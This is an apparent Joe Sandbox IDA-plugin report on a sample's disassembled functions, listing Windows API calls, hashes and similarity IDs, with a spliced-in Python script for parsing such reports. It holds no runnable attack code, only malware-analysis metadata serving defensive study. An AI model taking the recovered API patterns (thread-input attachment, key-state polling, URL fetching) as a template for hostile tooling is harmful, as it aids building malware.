                                                                                                                                                                                                                                  • Opcode ID: d5ae8ea9e9ffb8e797468f7bfe6ebed0c5980932d32afa4afca7261fda33f56b
                                                                                                                                                                                                                                  • Instruction ID: 8f452f34e2ed41016d8c835f9988500c695bcb96b2624748df3ac661bb07f3e8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d5ae8ea9e9ffb8e797468f7bfe6ebed0c5980932d32afa4afca7261fda33f56b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E421C274900118BBCF10EBA4DC85EFEBBB8EF45350F004526BA51A3291DB79480ADB60
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0099B329: _wcslen.LIBCMT ref: 0099B333
                                                                                                                                                                                                                                    • Part of subcall function 009F45FD: GetClassNameW.USER32(?,?,000000FF), ref: 009F4620
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 009F2990
                                                                                                                                                                                                                                  • GetDlgCtrlID.USER32 ref: 009F299B
                                                                                                                                                                                                                                  • GetParent.USER32 ref: 009F29B7
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 009F29BA
                                                                                                                                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 009F29C3
                                                                                                                                                                                                                                  • GetParent.USER32(?), ref: 009F29D7
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 009F29DA
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                  • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                  • Opcode ID: 8db2aa7917c66c1302b8f8a0e3bbbdbb69154215e331d76f447b3f786185e827
                                                                                                                                                                                                                                  • Instruction ID: 7456402f7f9575650cc6b8571cdfd34067f5c241257bb4f49b4d36fc816a9956
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8db2aa7917c66c1302b8f8a0e3bbbdbb69154215e331d76f447b3f786185e827
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA21F375D00218BBCF10EBA8DC85FFEBBB8EF04350F104416BA51A7192CB79494ADB60
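The per-function entries above are easier to triage once they are parsed into records: the same "API String ID" (711023334-1403004172) appears under two different Opcode IDs, and the raw SendMessageW message numbers are only meaningful once resolved to their names. The following is an added example, not Joe Sandbox's code and not code from the analysed sample. It assumes the plain-text layout shown in this report (an "APIs" header, bullet lines of the form "Name.MODULE(args), ref: ADDR", then the "Similarity" fields), takes the second reconstructed argument of SendMessageW as the message number, and resolves it with a small table of ListBox/ListView constants from the Windows SDK headers; the sample text is a constructed excerpt copied from the entries on this page.

```python
"""Parse Joe Sandbox per-function metadata (added example, not Joe Sandbox code)."""
import re
from collections import defaultdict

# Constructed sample: three entries in the report's layout, bookkeeping lines omitted.
SAMPLE = """\
APIs
  • Part of subcall function 009F45FD: GetClassNameW.USER32(?,?,000000FF), ref: 009F4620
• SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 009F28B1
• GetDlgCtrlID.USER32 ref: 009F28BC
• SendMessageW.USER32(00000000,?,00000111,?), ref: 009F28DB
Similarity
• API ID: MessageSend$CtrlParent$ClassName_wcslen
• String ID: ComboBox$ListBox
• API String ID: 711023334-1403004172
• Opcode ID: d5ae8ea9e9ffb8e797468f7bfe6ebed0c5980932d32afa4afca7261fda33f56b
APIs
• SendMessageW.USER32(?,00000186,00020000,00000000), ref: 009F2990
• GetDlgCtrlID.USER32 ref: 009F299B
Similarity
• API ID: MessageSend$CtrlParent$ClassName_wcslen
• String ID: ComboBox$ListBox
• API String ID: 711023334-1403004172
• Opcode ID: 8db2aa7917c66c1302b8f8a0e3bbbdbb69154215e331d76f447b3f786185e827
APIs
• SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00A24539
• GetWindowLongW.USER32(?,000000F0), ref: 00A24563
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00A24586
• SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00A246AF
Similarity
• API ID: MessageSend$LongWindow
• String ID:
• API String ID: 312131281-0
• Opcode ID: a29d0525deac4a660b40c3168d0586f6255f3b3af1ed70f420ddf168ae63958e
"""

# Message constants from WinUser.h / CommCtrl.h (LVM_FIRST = 0x1000) for the
# control messages seen in these entries; the table is an assumption of this
# example, not something the report states.
MSG_NAMES = {
    0x0111: "WM_COMMAND", 0x0186: "LB_SETCURSEL", 0x018C: "LB_SELECTSTRING",
    0x1004: "LVM_GETITEMCOUNT", 0x1008: "LVM_DELETEITEM",
    0x101D: "LVM_GETCOLUMNWIDTH", 0x101E: "LVM_SETCOLUMNWIDTH",
    0x101F: "LVM_GETHEADER", 0x104D: "LVM_INSERTITEMW",
    0x1057: "LVM_GETSTRINGWIDTHW", 0x1074: "LVM_SETITEMTEXTW",
}

API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z][A-Za-z ]*?):\s*(?P<val>.*)$")


def parse_entries(text):
    """Split the text at each 'APIs' header into {'apis': [...], 'fields': {...}}."""
    entries, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = {"apis": [], "fields": {}}
            entries.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:  # an API call site; '?' marks an argument the sandbox did not recover
            args = m.group("args")
            cur["apis"].append({
                "name": m.group("name"), "module": m.group("mod"),
                "args": args.split(",") if args else [],
                "ref": int(m.group("ref"), 16), "subcall": m.group("sub"),
            })
            continue
        m = FIELD_RE.match(line)
        if m:  # a Similarity field such as 'API String ID' or 'Opcode ID'
            cur["fields"][m.group("key")] = m.group("val").strip()
    return entries


def decode_messages(entry):
    """(ref, message name) per SendMessageW site; unrecovered messages stay as '?'."""
    out = []
    for api in entry["apis"]:
        if api["name"] != "SendMessageW" or len(api["args"]) < 2:
            continue
        raw = api["args"][1]
        try:
            msg = int(raw, 16)
        except ValueError:
            out.append((api["ref"], raw))
            continue
        out.append((api["ref"], MSG_NAMES.get(msg, f"0x{msg:04X}")))
    return out


def cluster_by_api_string_id(entries):
    """Group Opcode IDs by API String ID to spot one API/string pattern with several bodies."""
    groups = defaultdict(list)
    for e in entries:
        key = e["fields"].get("API String ID")
        if key:
            groups[key].append(e["fields"].get("Opcode ID"))
    return dict(groups)


if __name__ == "__main__":
    parsed = parse_entries(SAMPLE)
    for key, opcode_ids in cluster_by_api_string_id(parsed).items():
        print(f"API String ID {key}: {len(opcode_ids)} function(s)")
    for e in parsed:
        for ref, name in decode_messages(e):
            print(f"  {ref:08X}  SendMessageW {name}")
```

Running it on the excerpt reports two functions under API String ID 711023334-1403004172 (the two ComboBox/ListBox handlers with different Opcode IDs) and one under 312131281-0, and prints the resolved ListView and ListBox messages per call site. Argument reconstruction in sandbox output is best effort, so any site whose message shows as "?" should be confirmed in the disassembly before it is used as an indicator.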
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00A24539
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00A2453C
                                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00A24563
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00A24586
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00A245FE
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00A24648
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00A24663
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00A2467E
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00A24692
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00A246AF
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessageSend$LongWindow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 312131281-0
                                                                                                                                                                                                                                  • Opcode ID: a29d0525deac4a660b40c3168d0586f6255f3b3af1ed70f420ddf168ae63958e
                                                                                                                                                                                                                                  • Instruction ID: f245a39f5595b836611bf4da5a48bf087f935a83a320e87e5b37f565a45c1eb8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a29d0525deac4a660b40c3168d0586f6255f3b3af1ed70f420ddf168ae63958e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AA618B75A00218AFDB20DFA8DD81FEE77B8EF49710F100169FA14E72A1C7B4A956DB50
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 009FBB18
                                                                                                                                                                                                                                  • GetForegroundWindow.USER32(00000000,?,?,?,?,?,009FABA8,?,00000001), ref: 009FBB2C
                                                                                                                                                                                                                                  • GetWindowThreadProcessId.USER32(00000000), ref: 009FBB33
                                                                                                                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,009FABA8,?,00000001), ref: 009FBB42
                                                                                                                                                                                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 009FBB54
                                                                                                                                                                                                                                  • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,009FABA8,?,00000001), ref: 009FBB6D
                                                                                                                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,009FABA8,?,00000001), ref: 009FBB7F
                                                                                                                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,009FABA8,?,00000001), ref: 009FBBC4
                                                                                                                                                                                                                                  • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,009FABA8,?,00000001), ref: 009FBBD9
                                                                                                                                                                                                                                  • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,009FABA8,?,00000001), ref: 009FBBE4
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2156557900-0
                                                                                                                                                                                                                                  • Opcode ID: ce124ba82253e6607ad912afbebf2dc246357f2e238e5a48b9a0e7e1906391ae
                                                                                                                                                                                                                                  • Instruction ID: b8cbdd738a1cf6321e4034ad054392006750301f49700d0b68c8c5b66841539f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ce124ba82253e6607ad912afbebf2dc246357f2e238e5a48b9a0e7e1906391ae
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 60316D72904218BFDB20DFA8DC98F7A77BDAB49353F114025FB05D71A4D7B899428B60
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009C3007
                                                                                                                                                                                                                                    • Part of subcall function 009C2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,009CDB51,00A61DC4,00000000,00A61DC4,00000000,?,009CDB78,00A61DC4,00000007,00A61DC4,?,009CDF75,00A61DC4), ref: 009C2D4E
                                                                                                                                                                                                                                    • Part of subcall function 009C2D38: GetLastError.KERNEL32(00A61DC4,?,009CDB51,00A61DC4,00000000,00A61DC4,00000000,?,009CDB78,00A61DC4,00000007,00A61DC4,?,009CDF75,00A61DC4,00A61DC4), ref: 009C2D60
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009C3013
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009C301E
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009C3029
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009C3034
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009C303F
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009C304A
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009C3055
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009C3060
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009C306E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                  • Opcode ID: 3281ed4e5039e461c317472638702b8588b67961fafd0c263f449731459f7a7b
                                                                                                                                                                                                                                  • Instruction ID: 2f03ddb7331d664d09410379322350697880070fd0a232fba09ecd22bf390d0a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3281ed4e5039e461c317472638702b8588b67961fafd0c263f449731459f7a7b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C11CB76900108BFCB01EF54C842FDD3B75EF59350B9144A9F9099F172D631DE919B91
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A089F2
                                                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00A08A06
                                                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 00A08A30
                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00A08A4A
                                                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00A08A5C
                                                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00A08AA5
                                                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00A08AF5
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentDirectory$AttributesFile
                                                                                                                                                                                                                                  • String ID: *.*
                                                                                                                                                                                                                                  • API String ID: 769691225-438819550
                                                                                                                                                                                                                                  • Opcode ID: 3681c9e3eafcaeaa6c74b293c3617f18ba7b08f9998bf3bc5843f03fa9488b5f
                                                                                                                                                                                                                                  • Instruction ID: af7562c9ff518442109d0aafb20df71c2a54d9d9d4397499af9d9ff4b3eed92a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3681c9e3eafcaeaa6c74b293c3617f18ba7b08f9998bf3bc5843f03fa9488b5f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AF81AF729043089BCB24EF58D844ABAB3E8BF94390F54482EF8C5D7291DF39D9458B96
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetWindowLongW.USER32(?,000000EB), ref: 009974D7
                                                                                                                                                                                                                                    • Part of subcall function 00997567: GetClientRect.USER32(?,?), ref: 0099758D
                                                                                                                                                                                                                                    • Part of subcall function 00997567: GetWindowRect.USER32(?,?), ref: 009975CE
                                                                                                                                                                                                                                    • Part of subcall function 00997567: ScreenToClient.USER32(?,?), ref: 009975F6
                                                                                                                                                                                                                                  • GetDC.USER32 ref: 009D6083
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 009D6096
                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 009D60A4
                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 009D60B9
• ReleaseDC.USER32(?,00000000), ref: 009D60C1
• MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 009D6152
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
• String ID: U
• API String ID: 4009187628-3372436214
• Opcode ID: a4645c8f731c77a6e56a7945fc28bd7a5d0e18b97323e63fd73bfea595b4c6a8
• Instruction ID: def2f3237141e6048167cbe46af0745a18d9f19c0e22c737b165047e99b0c593
• Opcode Fuzzy Hash: a4645c8f731c77a6e56a7945fc28bd7a5d0e18b97323e63fd73bfea595b4c6a8
• Instruction Fuzzy Hash: 7571E031504205EFCF25CFA8CC84ABA7BBAFF49320F24866AED555A2A7C7359841DF50
APIs
  • Part of subcall function 0099249F: GetWindowLongW.USER32(00000000,000000EB), ref: 009924B0
  • Part of subcall function 009919CD: GetCursorPos.USER32(?), ref: 009919E1
  • Part of subcall function 009919CD: ScreenToClient.USER32(00000000,?), ref: 009919FE
  • Part of subcall function 009919CD: GetAsyncKeyState.USER32(00000001), ref: 00991A23
  • Part of subcall function 009919CD: GetAsyncKeyState.USER32(00000002), ref: 00991A3D
• ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 00A295C7
• ImageList_EndDrag.COMCTL32 ref: 00A295CD
• ReleaseCapture.USER32 ref: 00A295D3
• SetWindowTextW.USER32(?,00000000), ref: 00A2966E
• SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00A29681
• DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 00A2975B
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
• String ID: @GUI_DRAGFILE$@GUI_DROPID
• API String ID: 1924731296-2107944366
• Opcode ID: a98522679c295419097d9e2bc4cb6dbe51e38599e850020426e67cb70af1c7c9
• Instruction ID: dff862d704f8a487c4a3739ada6ba1b43036d186052795fccdd10c7241df692d
• Opcode Fuzzy Hash: a98522679c295419097d9e2bc4cb6dbe51e38599e850020426e67cb70af1c7c9
• Instruction Fuzzy Hash: 63517C71504310AFDB14EF28DC56FAA77E4FB88714F400A2CF996A72E2DB749909CB52
APIs
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00A0CCB7
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A0CCDF
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00A0CD0F
• GetLastError.KERNEL32 ref: 00A0CD67
• SetEvent.KERNEL32(?), ref: 00A0CD7B
• InternetCloseHandle.WININET(00000000), ref: 00A0CD86
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
• String ID:
• API String ID: 3113390036-3916222277
• Opcode ID: 672afa59c11903d528bab53e9c0c759d5d20b1214ab79cdc4166047bf4b2cfcf
• Instruction ID: f1b067f5a428ff70aeaf92d1896abb77b18b8fb92055ca3df737e3f123f15f92
• Opcode Fuzzy Hash: 672afa59c11903d528bab53e9c0c759d5d20b1214ab79cdc4166047bf4b2cfcf
• Instruction Fuzzy Hash: B6317F71500208AFD731EFA5ED88ABB7FFCEB45750B10462EF44696291DB34ED0A9B60
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,009D55AE,?,?,Bad directive syntax error,00A2DCD0,00000000,00000010,?,?), ref: 009FA236
• LoadStringW.USER32(00000000,?,009D55AE,?), ref: 009FA23D
  • Part of subcall function 0099B329: _wcslen.LIBCMT ref: 0099B333
• MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 009FA301
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: HandleLoadMessageModuleString_wcslen
• String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
• API String ID: 858772685-4153970271
• Opcode ID: 4750e3c68093a5979d8164f43795a8be686cc252ca1801498f273ab15e0c50ce
• Instruction ID: 21dc16b870262463e26d0fde3b9bad9954dc1baca48fbde0e03b1c80250c89bf
• Opcode Fuzzy Hash: 4750e3c68093a5979d8164f43795a8be686cc252ca1801498f273ab15e0c50ce
• Instruction Fuzzy Hash: 23214D7190421EAFCF11EBA4DC0AFFE7B39BF18700F044865F619650A2EB759618DB51
APIs
• GetParent.USER32 ref: 009F29F8
• GetClassNameW.USER32(00000000,?,00000100), ref: 009F2A0D
• SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 009F2A9A
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: ClassMessageNameParentSend
• String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
• API String ID: 1290815626-3381328864
• Opcode ID: b30b4d1d9faa56705591dc14e229e4680e3b3d41222c933dc5fa6e7efc7aeed7
• Instruction ID: bf2a9c0b1666859ee0b804f8ca63a41340bac873a6d3ec128ffa0925f6f9db1b
• Opcode Fuzzy Hash: b30b4d1d9faa56705591dc14e229e4680e3b3d41222c933dc5fa6e7efc7aeed7
• Instruction Fuzzy Hash: 7C11067638830BBAFE246724DC0AFF6379CAF55735B210022FA04E50D2FB65E8055614
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 0099758D
                                                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 009975CE
                                                                                                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 009975F6
                                                                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 0099773A
                                                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 0099775B
                                                                                                                                                                                                                                  Memory Dump Source
